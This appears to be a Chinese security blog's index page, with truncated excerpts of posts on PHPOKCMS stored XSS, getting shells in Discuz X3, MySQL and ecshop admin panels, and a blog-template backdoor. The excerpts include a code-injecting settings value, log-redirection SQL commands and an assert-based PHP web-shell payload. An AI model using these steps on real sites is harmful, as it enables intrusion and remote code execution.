-
PHPOKCMS存储型XSS漏洞挖掘
概述 PHPOKCMS这是一套允许用户高度自由配置的企业站程序,基于LGPL协议开源授权!CMS拥有直观、简洁、轻松愉悦的后台管理 ,完善的功能模块,强大的SEO搜索优化 及营销功…
-
Discuz X3 后台拿 shell
适用于 Discuz X3.3 及之前版本 魔术引号需关闭 站长 – Ucenter 设置 – Ucenter 应用 ID 填入 123′);file_pu…
-
Mysql日志拿shell
root权限 网站物理路径 文件位置未被限制 set global general_log = on; set global general_log_file = ‘F:/phpS…
-
ecshop后台拿shell
模板管理 – 语言项编辑 下拉栏选择 user.php 搜索 用户信息 后面加上代码 ${${assert($_POST[cmd])}} 确认修改 连接 根目录下 us…
-
关于Colorful2.6(明月浩空模板)后门剖析
2017年9月26日凌晨2点某朋友致电告诉我博客被黑 我默默地看了一眼原来是我们的模板作者(李明浩)来过 当时博客体现的是模板、文章被删(如下) 然而我并没有在意,默默地进入景安空…
专题之漏洞篇
专题之漏洞篇